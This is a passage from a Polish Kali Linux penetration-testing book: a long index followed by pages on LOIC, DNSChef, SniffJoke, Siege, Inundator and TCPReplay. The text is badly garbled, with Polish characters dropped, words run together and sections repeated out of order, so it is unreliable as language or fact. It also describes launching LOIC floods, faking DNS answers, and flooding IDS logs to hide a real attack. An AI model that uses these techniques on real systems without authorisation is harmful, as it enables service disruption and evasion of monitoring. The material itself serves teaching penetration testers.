TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 43: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

